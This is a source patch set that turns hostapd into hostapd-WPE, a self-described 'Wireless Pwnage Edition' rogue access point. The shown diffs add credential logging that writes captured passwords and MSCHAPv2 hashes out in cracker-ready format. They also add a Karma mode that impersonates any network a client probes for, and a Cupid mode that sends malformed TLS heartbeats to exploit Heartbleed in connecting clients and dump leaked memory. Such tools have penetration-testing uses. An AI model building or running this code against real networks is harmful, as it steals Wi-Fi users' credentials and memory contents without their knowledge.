+ va_end(ap);
+}
+
+void wpe_log_chalresp(char *type, const u8 *username, size_t username_len, const u8 *challenge, size_t challenge_len, const u8 *response, size_t response_len) {
+ time_t nowtime;
+ int x;
+
+ nowtime = time(NULL);
+
+ wpe_log_file_and_stdout("\n\n%s: %s", type, ctime(&nowtime));
+ wpe_log_file_and_stdout("\t username:\t");
+ for (x=0; x<username_len; x++)
+ wpe_log_file_and_stdout("%c",username[x]);
+ wpe_log_file_and_stdout("\n");
+
+ wpe_log_file_and_stdout("\t challenge:\t");
+ for (x=0; x<challenge_len - 1; x++)
+ wpe_log_file_and_stdout("%02x:",challenge[x]);
+ wpe_log_file_and_stdout("%02x\n",challenge[x]);
+
+ wpe_log_file_and_stdout("\t response:\t");
+ for (x=0; x<response_len - 1; x++)
+ wpe_log_file_and_stdout("%02x:",response[x]);
+ wpe_log_file_and_stdout("%02x\n",response[x]);
+
+ if (strncmp(type, "mschapv2", 8) == 0 || strncmp(type, "eap-ttls/mschapv2", 17) == 0) {
+ wpe_log_file_and_stdout("\t jtr NETNTLM:\t");
+ for (x=0; x<username_len; x++)
+ wpe_log_file_and_stdout("%c",username[x]);
+ wpe_log_file_and_stdout(":$NETNTLM$");
+
+ for (x=0; x<challenge_len; x++)
+ wpe_log_file_and_stdout("%02x",challenge[x]);
+ wpe_log_file_and_stdout("$");
+ for (x=0; x<response_len; x++)
+ wpe_log_file_and_stdout("%02x",response[x]);
+ wpe_log_file_and_stdout("\n");
+ }
+}
+
+void wpe_log_basic(char *type, const u8 *username, size_t username_len, const u8 *password, size_t password_len) {
+ time_t nowtime;
+ int x;
+
+ nowtime = time(NULL);
+
+ wpe_log_file_and_stdout("\n\n%s: %s",type, ctime(&nowtime));
+ wpe_log_file_and_stdout("\t username:\t");
+ for (x=0; x<username_len; x++)
+ wpe_log_file_and_stdout("%c",username[x]);
+ wpe_log_file_and_stdout("\n");
+
+ wpe_log_file_and_stdout("\t password:\t");
+ for (x=0; x<password_len; x++)
+ wpe_log_file_and_stdout("%c",password[x]);
+ wpe_log_file_and_stdout("\n");
+}
+
+/*
+ Taken from asleap, who took from nmap, who took from tcpdump :)
+*/
+void wpe_hexdump(unsigned char *bp, unsigned int length)
+{
+
+ /* stolen from tcpdump, then kludged extensively */
+
+ static const char asciify[] =
+ "................................ !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~.................................................................................................................................";
+
+ const unsigned short *sp;
+ const unsigned char *ap;
+ unsigned int i, j;
+ int nshorts, nshorts2;
+ int padding;
+
+ wpe_log_file_and_stdout("\n\t");
+ padding = 0;
+ sp = (unsigned short *)bp;
+ ap = (unsigned char *)bp;
+ nshorts = (unsigned int)length / sizeof(unsigned short);
+ nshorts2 = (unsigned int)length / sizeof(unsigned short);
+ i = 0;
+ j = 0;
+ while (1) {
+ while (--nshorts >= 0) {
+ wpe_log_file_and_stdout(" %04x", ntohs(*sp));
+ sp++;
+ if ((++i % 8) == 0)
+ break;
+ }
+ if (nshorts < 0) {
+ if ((length & 1) && (((i - 1) % 8) != 0)) {
+ wpe_log_file_and_stdout(" %02x ", *(unsigned char *)sp);
+ padding++;
+ }
+ nshorts = (8 - (nshorts2 - nshorts));
+ while (--nshorts >= 0) {
+ wpe_log_file_and_stdout(" ");
+ }
+ if (!padding)
+ wpe_log_file_and_stdout(" ");
+ }
+ wpe_log_file_and_stdout(" ");
+
+ while (--nshorts2 >= 0) {
+ wpe_log_file_and_stdout("%c%c", asciify[*ap], asciify[*(ap + 1)]);
+ ap += 2;
+ if ((++j % 8) == 0) {
+ wpe_log_file_and_stdout("\n\t");
+ break;
+ }
+ }
+ if (nshorts2 < 0) {
+ if ((length & 1) && (((j - 1) % 8) != 0)) {
+ wpe_log_file_and_stdout("%c", asciify[*ap]);
+ }
+ break;
+ }
+ }
+ if ((length & 1) && (((i - 1) % 8) == 0)) {
+ wpe_log_file_and_stdout(" %02x", *(unsigned char *)sp);
+ wpe_log_file_and_stdout(" %c",
+ asciify[*ap]);
+ }
+ wpe_log_file_and_stdout("\n");
+}
+
+void wpe_hb_cb(int v_write_p, int v_version, int v_content_type, const void* v_buf, size_t v_len, SSL* v_ssl, void* v_arg) {
+ if (v_content_type == TLS1_RT_HEARTBEAT) {
+ wpe_log_file_and_stdout("\n\nHeartbleed Data:\n");
+ v_ssl->tlsext_hb_pending = 1;
+ wpe_hexdump((unsigned char *)v_buf, v_len);
+ }
+}
+
+
+char *wpe_hb_clear() {
+ char *p;
+ // set payload size
+ p = &wpe_hb_msg[sizeof(wpe_hb_msg) - 3];
+ s2n(wpe_conf.wpe_hb_payload_size, p);
+
+ return wpe_hb_msg;
+}
+
diff -rupN hostapd-2.5/src/wpe/wpe.h hostapd-2.5-wpe/src/wpe/wpe.h
--- hostapd-2.5/src/wpe/wpe.h 1970-01-01 01:00:00.000000000 +0100
+++ hostapd-2.5-wpe/src/wpe/wpe.h 2015-10-25 16:52:26.349508655 +0100
@@ -0,0 +1,50 @@
+/*
+ wpe.h -
+ brad.antoniewicz@foundstone.com
+ Implements WPE (Wireless Pwnage Edition) functionality within
+ hostapd.
+
+ WPE functionality focuses on targeting connecting users. At
+ it's core it implements credential logging (originally
+ implemented in FreeRADIUS-WPE), but also includes other patches
+ for other client attacks.
+
+ FreeRADIUS-WPE: https://github.com/brad-anton/freeradius-wpe
+ Karma patch: http://foofus.net/goons/jmk/tools/hostapd-1.0-karma.diff
+ Cupid patch: https://github.com/lgrangeia/cupid/blob/master/patch-hostapd
+*/
+#include <openssl/ssl.h>
+
+struct wpe_config {
+ char *wpe_logfile;
+ FILE *wpe_logfile_fp;
+ unsigned int wpe_enable_karma;
+ unsigned int wpe_enable_cupid;
+ unsigned int wpe_enable_return_success;
+ unsigned int wpe_hb_send_before_handshake:1;
+ unsigned int wpe_hb_send_before_appdata:1;
+ unsigned int wpe_hb_send_after_appdata:1;
+ unsigned int wpe_hb_payload_size;
+ unsigned int wpe_hb_num_tries;
+ unsigned int wpe_hb_num_repeats;
+};
+
+extern struct wpe_config wpe_conf;
+
+extern char wpe_hb_msg[];
+extern size_t wpe_hb_msg_len;
+
+//#define WPE_HB_MSG_LEN 8
+
+#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \
+ (((unsigned int)(c[1])) )),c+=2)
+
+#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \
+ c[1]=(unsigned char)(((s) )&0xff)),c+=2)
+
+
+void wpe_log_file_and_stdout(char const *fmt, ...);
+void wpe_log_chalresp(char *type, const u8 *username, size_t username_len, const u8 *challenge, size_t challenge_len, const u8 *response, size_t response_len);
+void wpe_log_basic(char *type, const u8 *username, size_t username_len, const u8 *password, size_t password_len);
+void wpe_hb_cb(int v_write_p, int v_version, int v_content_type, const void* v_buf, size_t v_len, SSL* v_ssl, void* v_arg);
+char *wpe_hb_clear();


@ -1,989 +0,0 @@
diff -rupN hostapd-2.6/hostapd/config_file.c hostapd-2.6-wpe/hostapd/config_file.c
--- hostapd-2.6/hostapd/config_file.c 2016-10-02 14:51:11.000000000 -0400
+++ hostapd-2.6-wpe/hostapd/config_file.c 2016-12-17 06:12:53.647984078 -0500
@@ -20,7 +20,7 @@
#include "ap/wpa_auth.h"
#include "ap/ap_config.h"
#include "config_file.h"
-
+#include "wpe/wpe.h"
#ifndef CONFIG_NO_RADIUS
#ifdef EAP_SERVER
@@ -2108,6 +2108,20 @@ static int hostapd_config_fill(struct ho
return 1;
}
wpa_printf(MSG_DEBUG, "eapol_version=%d", bss->eapol_version);
+ } else if (os_strcmp(buf, "wpe_logfile") == 0) {
+ wpe_conf.wpe_logfile = os_strdup(pos);
+ } else if (os_strcmp(buf, "wpe_hb_send_before_handshake") == 0) {
+ wpe_conf.wpe_hb_send_before_handshake = atoi(pos);
+ } else if (os_strcmp(buf, "wpe_hb_send_before_appdata") == 0) {
+ wpe_conf.wpe_hb_send_before_appdata = atoi(pos);
+ } else if (os_strcmp(buf, "wpe_hb_send_after_appdata") == 0) {
+ wpe_conf.wpe_hb_send_after_appdata = atoi(pos);
+ } else if (os_strcmp(buf, "wpe_hb_payload_size") == 0) {
+ wpe_conf.wpe_hb_payload_size = atoi(pos);
+ } else if (os_strcmp(buf, "wpe_hb_num_repeats") == 0) {
+ wpe_conf.wpe_hb_num_repeats = atoi(pos);
+ } else if (os_strcmp(buf, "wpe_hb_num_tries") == 0) {
+ wpe_conf.wpe_hb_num_tries = atoi(pos);
#ifdef EAP_SERVER
} else if (os_strcmp(buf, "eap_authenticator") == 0) {
bss->eap_server = atoi(pos);
diff -rupN hostapd-2.6/hostapd/hostapd-wpe.eap_user hostapd-2.6-wpe/hostapd/hostapd-wpe.eap_user
--- hostapd-2.6/hostapd/hostapd-wpe.eap_user 1969-12-31 19:00:00.000000000 -0500
+++ hostapd-2.6-wpe/hostapd/hostapd-wpe.eap_user 2016-12-17 06:12:53.947984072 -0500
@@ -0,0 +1,107 @@
+# hostapd user database for integrated EAP server
+
+# Each line must contain an identity, EAP method(s), and an optional password
+# separated with whitespace (space or tab). The identity and password must be
+# double quoted ("user"). Password can alternatively be stored as
+# NtPasswordHash (16-byte MD4 hash of the unicode presentation of the password
+# in unicode) if it is used for MSCHAP or MSCHAPv2 authentication. This means
+# that the plaintext password does not need to be included in the user file.
+# Password hash is stored as hash:<16-octets of hex data> without quotation
+# marks.
+
+# [2] flag in the end of the line can be used to mark users for tunneled phase
+# 2 authentication (e.g., within EAP-PEAP). In these cases, an anonymous
+# identity can be used in the unencrypted phase 1 and the real user identity
+# is transmitted only within the encrypted tunnel in phase 2. If non-anonymous
+# access is needed, two user entries is needed, one for phase 1 and another
+# with the same username for phase 2.
+#
+# EAP-TLS, EAP-PEAP, EAP-TTLS, EAP-FAST, EAP-SIM, and EAP-AKA do not use
+# password option.
+# EAP-MD5, EAP-MSCHAPV2, EAP-GTC, EAP-PAX, EAP-PSK, and EAP-SAKE require a
+# password.
+# EAP-PEAP, EAP-TTLS, and EAP-FAST require Phase 2 configuration.
+#
+# * can be used as a wildcard to match any user identity. The main purposes for
+# this are to set anonymous phase 1 identity for EAP-PEAP and EAP-TTLS and to
+# avoid having to configure every certificate for EAP-TLS authentication. The
+# first matching entry is selected, so * should be used as the last phase 1
+# user entry.
+#
+# "prefix"* can be used to match the given prefix and anything after this. The
+# main purpose for this is to be able to avoid EAP method negotiation when the
+# method is using known prefix in identities (e.g., EAP-SIM and EAP-AKA). This
+# is only allowed for phase 1 identities.
+#
+# Multiple methods can be configured to make the authenticator try them one by
+# one until the peer accepts one. The method names are separated with a
+# comma (,).
+#
+# [ver=0] and [ver=1] flags after EAP type PEAP can be used to force PEAP
+# version based on the Phase 1 identity. Without this flag, the EAP
+# authenticator advertises the highest supported version and select the version
+# based on the first PEAP packet from the supplicant.
+#
+# EAP-TTLS supports both EAP and non-EAP authentication inside the tunnel.
+# Tunneled EAP methods are configured with standard EAP method name and [2]
+# flag. Non-EAP methods can be enabled by following method names: TTLS-PAP,
+# TTLS-CHAP, TTLS-MSCHAP, TTLS-MSCHAPV2. TTLS-PAP and TTLS-CHAP require a
+# plaintext password while TTLS-MSCHAP and TTLS-MSCHAPV2 can use NT password
+# hash.
+#
+# Arbitrary RADIUS attributes can be added into Access-Accept packets similarly
+# to the way radius_auth_req_attr is used for Access-Request packet in
+# hostapd.conf. For EAP server, this is configured separately for each user
+# entry with radius_accept_attr=<value> line(s) following the main user entry
+# line.
+
+# Phase 1 users
+#"user" MD5 "password"
+#"test user" MD5 "secret"
+#"example user" TLS
+#"DOMAIN\user" MSCHAPV2 "password"
+#"gtc user" GTC "password"
+#"pax user" PAX "unknown"
+#"pax.user@example.com" PAX 0123456789abcdef0123456789abcdef
+#"psk user" PSK "unknown"
+#"psk.user@example.com" PSK 0123456789abcdef0123456789abcdef
+#"sake.user@example.com" SAKE 0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef
+#"ttls" TTLS
+#"not anonymous" PEAP
+# Default to EAP-SIM and EAP-AKA based on fixed identity prefixes
+#"0"* AKA,TTLS,TLS,PEAP,SIM
+#"1"* SIM,TTLS,TLS,PEAP,AKA
+#"2"* AKA,TTLS,TLS,PEAP,SIM
+#"3"* SIM,TTLS,TLS,PEAP,AKA
+#"4"* AKA,TTLS,TLS,PEAP,SIM
+#"5"* SIM,TTLS,TLS,PEAP,AKA
+#"6"* AKA'
+#"7"* AKA'
+#"8"* AKA'
+
+# Wildcard for all other identities
+#* PEAP,TTLS,TLS,SIM,AKA
+
+# Phase 2 (tunnelled within EAP-PEAP or EAP-TTLS) users
+#"t-md5" MD5 "password" [2]
+#"DOMAIN\t-mschapv2" MSCHAPV2 "password" [2]
+#"t-gtc" GTC "password" [2]
+#"not anonymous" MSCHAPV2 "password" [2]
+#"user" MD5,GTC,MSCHAPV2 "password" [2]
+#"test user" MSCHAPV2 hash:000102030405060708090a0b0c0d0e0f [2]
+#"ttls-user" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,TTLS-MSCHAPV2 "password" [2]
+
+# Default to EAP-SIM and EAP-AKA based on fixed identity prefixes in phase 2
+#"0"* AKA [2]
+#"1"* SIM [2]
+#"2"* AKA [2]
+#"3"* SIM [2]
+#"4"* AKA [2]
+#"5"* SIM [2]
+#"6"* AKA' [2]
+#"7"* AKA' [2]
+#"8"* AKA' [2]
+
+# WPE - DO NOT REMOVE - These entries are specifically in here
+* PEAP,TTLS,TLS,FAST
+"t" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "t" [2]
diff -rupN hostapd-2.6/hostapd/main.c hostapd-2.6-wpe/hostapd/main.c
--- hostapd-2.6/hostapd/main.c 2016-10-02 14:51:11.000000000 -0400
+++ hostapd-2.6-wpe/hostapd/main.c 2016-12-17 06:12:53.947984072 -0500
@@ -28,7 +28,7 @@
#include "config_file.h"
#include "eap_register.h"
#include "ctrl_iface.h"
-
+#include "wpe/wpe.h"
struct hapd_global {
void **drv_priv;
@@ -448,11 +448,16 @@ static int hostapd_global_run(struct hap
static void show_version(void)
{
fprintf(stderr,
- "hostapd v" VERSION_STR "\n"
+ "hostapd-WPE v" VERSION_STR "\n"
"User space daemon for IEEE 802.11 AP management,\n"
"IEEE 802.1X/WPA/WPA2/EAP/RADIUS Authenticator\n"
"Copyright (c) 2002-2016, Jouni Malinen <j@w1.fi> "
- "and contributors\n");
+ "and contributors\n"
+ "-----------------------------------------------------\n"
+ "WPE (Wireless Pwnage Edition)\n"
+ "This version has been cleverly modified to target\n"
+ "wired and wireless users.\n"
+ "Thomas d'Otreppe <@aircrackng>");
}
@@ -461,7 +466,7 @@ static void usage(void)
show_version();
fprintf(stderr,
"\n"
- "usage: hostapd [-hdBKtv] [-P <PID file>] [-e <entropy file>] "
+ "usage: hostapd-wpe [-hdBKtvskc] [-P <PID file>] [-e <entropy file>] "
"\\\n"
" [-g <global ctrl_iface>] [-G <group>]\\\n"
" [-i <comma-separated list of interface names>]\\\n"
@@ -486,7 +491,12 @@ static void usage(void)
" -i list of interface names to use\n"
" -S start all the interfaces synchronously\n"
" -t include timestamps in some debug messages\n"
- " -v show hostapd version\n");
+ " -v show hostapd version\n\n"
+ " WPE Options -------------------\n"
+ " (credential logging always enabled)\n"
+ " -s Return Success where possible\n"
+ " -k Karma Mode (Respond to all probes)\n"
+ " -c Cupid Mode (Heartbleed clients)\n\n");
exit(1);
}
@@ -661,7 +671,7 @@ int main(int argc, char *argv[])
dl_list_init(&interfaces.global_ctrl_dst);
for (;;) {
- c = getopt(argc, argv, "b:Bde:f:hi:KP:STtu:vg:G:");
+ c = getopt(argc, argv, "b:Bde:f:hi:KP:STtu:vg:G:kcs");
if (c < 0)
break;
switch (c) {
@@ -725,6 +735,15 @@ int main(int argc, char *argv[])
case 'u':
return gen_uuid(optarg);
#endif /* CONFIG_WPS */
+ case 'k':
+ wpe_conf.wpe_enable_karma++;
+ break;
+ case 'c':
+ wpe_conf.wpe_enable_cupid++;
+ break;
+ case 's':
+ wpe_conf.wpe_enable_return_success++;
+ break;
case 'i':
if (hostapd_get_interface_names(&if_names,
&if_names_size, optarg))
diff -rupN hostapd-2.6/hostapd/Makefile hostapd-2.6-wpe/hostapd/Makefile
--- hostapd-2.6/hostapd/Makefile 2016-10-02 14:51:11.000000000 -0400
+++ hostapd-2.6-wpe/hostapd/Makefile 2016-12-17 06:12:53.955984072 -0500
@@ -86,6 +86,7 @@ OBJS += ../src/ap/beacon.o
OBJS += ../src/ap/bss_load.o
OBJS += ../src/ap/neighbor_db.o
OBJS += ../src/ap/rrm.o
+OBJS += ../src/wpe/wpe.o
OBJS_c = hostapd_cli.o
OBJS_c += ../src/common/wpa_ctrl.o
@@ -1012,7 +1013,7 @@ OBJS += ../src/fst/fst_ctrl_iface.o
endif
endif
-ALL=hostapd hostapd_cli
+ALL=hostapd-wpe hostapd-wpe_cli
all: verify_config $(ALL)
@@ -1051,6 +1052,15 @@ $(DESTDIR)$(BINDIR)/%: %
install: $(addprefix $(DESTDIR)$(BINDIR)/,$(ALL))
+wpe:
+ install -d $(DESTDIR)/etc/hostapd-wpe
+ install -m 644 hostapd-wpe.conf hostapd-wpe.eap_user $(DESTDIR)/etc/hostapd-wpe
+ install -d $(DESTDIR)/etc/hostapd-wpe/certs
+ install -d $(DESTDIR)/etc/hostapd-wpe/certs/demoCA
+ install -m 644 certs/demoCA/cacert.pem $(DESTDIR)/etc/hostapd-wpe/certs/demoCA
+ install -m 755 certs/bootstrap $(DESTDIR)/etc/hostapd-wpe/certs
+ install -m 644 certs/ca.cnf certs/client.cnf certs/Makefile certs/README certs/README.wpe certs/server.cnf certs/xpextensions $(DESTDIR)/etc/hostapd-wpe/certs
+
../src/drivers/build.hostapd:
@if [ -f ../src/drivers/build.wpa_supplicant ]; then \
$(MAKE) -C ../src/drivers clean; \
@@ -1059,15 +1069,15 @@ install: $(addprefix $(DESTDIR)$(BINDIR)
BCHECK=../src/drivers/build.hostapd
-hostapd: $(BCHECK) $(OBJS)
- $(Q)$(CC) $(LDFLAGS) -o hostapd $(OBJS) $(LIBS)
+hostapd-wpe: $(BCHECK) $(OBJS)
+ $(Q)$(CC) $(LDFLAGS) -o hostapd-wpe $(OBJS) $(LIBS)
@$(E) " LD " $@
ifdef CONFIG_WPA_TRACE
OBJS_c += ../src/utils/trace.o
endif
-hostapd_cli: $(OBJS_c)
- $(Q)$(CC) $(LDFLAGS) -o hostapd_cli $(OBJS_c) $(LIBS_c)
+hostapd-wpe_cli: $(OBJS_c)
+ $(Q)$(CC) $(LDFLAGS) -o hostapd-wpe_cli $(OBJS_c) $(LIBS_c)
@$(E) " LD " $@
NOBJS = nt_password_hash.o ../src/crypto/ms_funcs.o $(SHA1OBJS)
@@ -1114,7 +1124,7 @@ lcov-html:
clean:
$(MAKE) -C ../src clean
- rm -f core *~ *.o hostapd hostapd_cli nt_password_hash hlr_auc_gw
+ rm -f core *~ *.o hostapd-wpe hostapd-wpe_cli nt_password_hash hlr_auc_gw
rm -f *.d *.gcno *.gcda *.gcov
rm -f lcov.info
rm -rf lcov-html
diff -rupN hostapd-2.6/src/ap/beacon.c hostapd-2.6-wpe/src/ap/beacon.c
--- hostapd-2.6/src/ap/beacon.c 2016-10-02 14:51:11.000000000 -0400
+++ hostapd-2.6-wpe/src/ap/beacon.c 2016-12-17 06:12:53.955984072 -0500
@@ -30,7 +30,7 @@
#include "hs20.h"
#include "dfs.h"
#include "taxonomy.h"
-
+#include "wpe/wpe.h"
#ifdef NEED_AP_MLME
@@ -817,6 +817,13 @@ void handle_probe_req(struct hostapd_dat
}
#endif /* CONFIG_TAXONOMY */
+ if (wpe_conf.wpe_enable_karma && elems.ssid_len > 0) {
+ wpa_printf(MSG_MSGDUMP,"[WPE] Probe request from " MACSTR ", changing SSID to '%s'", MAC2STR(mgmt->sa), wpa_ssid_txt(elems.ssid, elems.ssid_len));
+ hostapd_set_ssid(hapd,elems.ssid,elems.ssid_len);
+ os_memcpy(&hapd->conf->ssid.ssid,elems.ssid,elems.ssid_len);
+ hapd->conf->ssid.ssid_len = elems.ssid_len;
+ }
+
res = ssid_match(hapd, elems.ssid, elems.ssid_len,
elems.ssid_list, elems.ssid_list_len);
if (res == NO_SSID_MATCH) {
diff -rupN hostapd-2.6/src/ap/ieee802_11.c hostapd-2.6-wpe/src/ap/ieee802_11.c
--- hostapd-2.6/src/ap/ieee802_11.c 2016-10-02 14:51:11.000000000 -0400
+++ hostapd-2.6-wpe/src/ap/ieee802_11.c 2016-12-17 06:12:53.955984072 -0500
@@ -45,7 +45,7 @@
#include "mbo_ap.h"
#include "rrm.h"
#include "taxonomy.h"
-
+#include "wpe/wpe.h"
u8 * hostapd_eid_supp_rates(struct hostapd_data *hapd, u8 *eid)
{
@@ -1418,8 +1418,8 @@ static u16 check_ssid(struct hostapd_dat
if (ssid_ie == NULL)
return WLAN_STATUS_UNSPECIFIED_FAILURE;
- if (ssid_ie_len != hapd->conf->ssid.ssid_len ||
- os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0) {
+ if ((!wpe_conf.wpe_enable_karma) && (ssid_ie_len != hapd->conf->ssid.ssid_len ||
+ os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0)) {
hostapd_logger(hapd, sta->addr, HOSTAPD_MODULE_IEEE80211,
HOSTAPD_LEVEL_INFO,
"Station tried to associate with unknown SSID "
diff -rupN hostapd-2.6/src/crypto/ms_funcs.h hostapd-2.6-wpe/src/crypto/ms_funcs.h
--- hostapd-2.6/src/crypto/ms_funcs.h 2016-10-02 14:51:11.000000000 -0400
+++ hostapd-2.6-wpe/src/crypto/ms_funcs.h 2016-12-17 06:12:53.955984072 -0500
@@ -9,6 +9,10 @@
#ifndef MS_FUNCS_H
#define MS_FUNCS_H
+int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
+ const u8 *username, size_t username_len,
+ u8 *challenge);
+
int generate_nt_response(const u8 *auth_challenge, const u8 *peer_challenge,
const u8 *username, size_t username_len,
const u8 *password, size_t password_len,
diff -rupN hostapd-2.6/src/crypto/tls_openssl.c hostapd-2.6-wpe/src/crypto/tls_openssl.c
--- hostapd-2.6/src/crypto/tls_openssl.c 2016-10-02 14:51:11.000000000 -0400
+++ hostapd-2.6-wpe/src/crypto/tls_openssl.c 2016-12-17 06:16:43.435979728 -0500
@@ -21,6 +21,7 @@
#include <openssl/opensslv.h>
#include <openssl/pkcs12.h>
#include <openssl/x509v3.h>
+#include <openssl/rand.h>
#ifndef OPENSSL_NO_ENGINE
#include <openssl/engine.h>
#endif /* OPENSSL_NO_ENGINE */
@@ -37,6 +38,7 @@
#include "sha256.h"
#include "tls.h"
#include "tls_openssl.h"
+#include "wpe/wpe.h"
#if !defined(CONFIG_FIPS) && \
(defined(EAP_FAST) || defined(EAP_FAST_DYNAMIC) || \
@@ -179,6 +181,8 @@ static int tls_add_ca_from_keystore_enco
#endif /* ANDROID */
+int wpe_hb_enc(struct tls_connection *conn); // WPE: To limit changes up top
+
static int tls_openssl_ref_count = 0;
static int tls_ex_idx_session = -1;
@@ -1347,7 +1351,10 @@ struct tls_connection * tls_connection_i
conn->context = context;
SSL_set_app_data(conn->ssl, conn);
- SSL_set_msg_callback(conn->ssl, tls_msg_cb);
+ if (wpe_conf.wpe_enable_cupid)
+ SSL_set_msg_callback(conn->ssl, wpe_hb_cb);
+ else
+ SSL_set_msg_callback(conn->ssl, tls_msg_cb);
SSL_set_msg_callback_arg(conn->ssl, conn);
options = SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3 |
SSL_OP_SINGLE_DH_USE;
@@ -3255,8 +3262,10 @@ static struct wpabuf *
openssl_handshake(struct tls_connection *conn, const struct wpabuf *in_data,
int server)
{
- int res;
+ int res,i;
struct wpabuf *out_data;
+ struct wpabuf *wpe_hb_ptr1, *wpe_hb_ptr2;
+
/*
* Give TLS handshake data from the server (if available) to OpenSSL
@@ -3316,6 +3325,25 @@ openssl_handshake(struct tls_connection
}
wpabuf_put(out_data, res);
+ if (wpe_conf.wpe_enable_cupid && wpe_conf.wpe_hb_send_before_handshake && wpe_conf.wpe_hb_num_tries) {
+
+ wpa_printf(MSG_DEBUG, "[WPE] Sending heartbeat request instead of handshake\n");
+ wpe_hb_ptr1 = NULL;
+ for (i=0; i < wpe_conf.wpe_hb_num_repeats; i++) {
+ wpe_hb_ptr2 = wpabuf_alloc(wpe_hb_msg_len-1);
+ memcpy(wpabuf_mhead(wpe_hb_ptr2), (u8 *)wpe_hb_clear(), wpe_hb_msg_len-1);
+ wpabuf_put(wpe_hb_ptr2, wpe_hb_msg_len-1);
+ if (wpe_hb_ptr1) {
+ wpe_hb_ptr1 = wpabuf_concat(wpe_hb_ptr1,wpe_hb_ptr2);
+ } else {
+ wpe_hb_ptr1 = wpe_hb_ptr2;
+ }
+ }
+ conn->ssl->tlsext_hb_pending = 1;
+ wpe_conf.wpe_hb_num_tries--;
+ return wpe_hb_ptr1;
+ }
+
return out_data;
}
@@ -3431,6 +3459,10 @@ struct wpabuf * tls_connection_encrypt(v
tls_show_errors(MSG_INFO, __func__, "BIO_reset failed");
return NULL;
}
+
+ if (wpe_conf.wpe_enable_cupid && wpe_conf.wpe_hb_send_before_appdata)
+ wpe_hb_enc(conn);
+
res = SSL_write(conn->ssl, wpabuf_head(in_data), wpabuf_len(in_data));
if (res < 0) {
tls_show_errors(MSG_INFO, __func__,
@@ -3438,6 +3470,10 @@ struct wpabuf * tls_connection_encrypt(v
return NULL;
}
+ if (wpe_conf.wpe_enable_cupid && wpe_conf.wpe_hb_send_after_appdata)
+ wpe_hb_enc(conn);
+
+
/* Read encrypted data to be sent to the server */
buf = wpabuf_alloc(wpabuf_len(in_data) + 300);
if (buf == NULL)
@@ -4331,3 +4367,67 @@ void tls_connection_remove_session(struc
wpa_printf(MSG_DEBUG,
"OpenSSL: Removed cached session to disable session resumption");
}
+
+int wpe_hb_enc(struct tls_connection *conn) {
+ unsigned char *cbuf, *p;
+
+ unsigned int real_payload = 18; //default: 18 /* Sequence number + random bytes */
+ unsigned int padding = 16; //default: 16 /* Use minimum padding */
+
+ if (!SSL_is_init_finished(conn->ssl)) {
+ return -1;
+ }
+
+ if(!conn->ssl->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
+ conn->ssl->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS) {
+ wpa_printf(MSG_DEBUG, "[WPE] warning: heartbeat extension is unsupported (try anyway)\n");
+ } else {
+ wpa_printf(MSG_DEBUG,"[WPE] Heartbeat extention is supported, may not be vulnerable!\n");
+ }
+
+ /* Check if padding is too long, payload and padding
+ * must not exceed 2^14 - 3 = 16381 bytes in total.
+ */
+ OPENSSL_assert(real_payload + padding <= 16381);
+
+ cbuf = OPENSSL_malloc(1 + 2 + real_payload + padding);
+
+ if(cbuf==NULL)
+ return -1;
+
+ p = cbuf;
+
+ *p++ = TLS1_HB_REQUEST;
+
+
+ /* Payload length (18 bytes here) */
+ //s2n(payload, p); /* standards compliant payload */
+ //s2n(payload +10, p); /* >payload to exploit heartbleed!!! */
+ s2n(wpe_conf.wpe_hb_payload_size, p); /* configured payload */
+
+ /* Sequence number */
+ s2n(conn->ssl->tlsext_hb_seq, p);
+ /* 16 random bytes */
+ RAND_pseudo_bytes(p, 16);
+ //RAND_bytes(p, 16);
+ p += 16;
+ /* Random padding */
+ RAND_pseudo_bytes(p, padding);
+ //RAND_bytes(p, padding);
+
+ wpa_printf(MSG_DEBUG, "[WPE] Sending heartbeat reaquesting payload size %u...\n", wpe_conf.wpe_hb_payload_size);
+ wpa_hexdump(MSG_DEBUG, "[WPE] heartbeat packet to send:", cbuf, 1 + 2 + real_payload + padding);
+
+ /* Send heartbeat request */
+#ifdef TLS1_RT_HEARTBEAT
+ if (SSL_get_ssl_method(conn->ssl)->ssl_write_bytes(conn->ssl, TLS1_RT_HEARTBEAT,
+#elif defined(DTLS1_RT_HEARTBEAT)
+ if (SSL_get_ssl_method(conn->ssl)->ssl_write_bytes(conn->ssl, DTLS1_RT_HEARTBEAT,
+#endif
+ cbuf, 3 + real_payload + padding) >= 0)
+ conn->ssl->tlsext_hb_pending = 1;
+ OPENSSL_free(cbuf);
+
+ return 0;
+}
+
diff -rupN hostapd-2.6/src/eap_server/eap_server.c hostapd-2.6-wpe/src/eap_server/eap_server.c
--- hostapd-2.6/src/eap_server/eap_server.c 2016-10-02 14:51:11.000000000 -0400
+++ hostapd-2.6-wpe/src/eap_server/eap_server.c 2016-12-17 06:12:53.955984072 -0500
@@ -23,7 +23,8 @@
#define STATE_MACHINE_DATA struct eap_sm
#define STATE_MACHINE_DEBUG_PREFIX "EAP"
-#define EAP_MAX_AUTH_ROUNDS 50
+//#define EAP_MAX_AUTH_ROUNDS 50
+#define EAP_MAX_AUTH_ROUNDS 50000 // wpe >:)
static void eap_user_free(struct eap_user *user);
@@ -164,6 +165,8 @@ int eap_user_get(struct eap_sm *sm, cons
{
struct eap_user *user;
+ char ident = 't';
+
if (sm == NULL || sm->eapol_cb == NULL ||
sm->eapol_cb->get_eap_user == NULL)
return -1;
@@ -175,6 +178,11 @@ int eap_user_get(struct eap_sm *sm, cons
if (user == NULL)
return -1;
+ if (phase2) {
+ identity = (const u8 *)&ident;
+ identity_len = 1;
+ }
+
if (sm->eapol_cb->get_eap_user(sm->eapol_ctx, identity,
identity_len, phase2, user) != 0) {
eap_user_free(user);
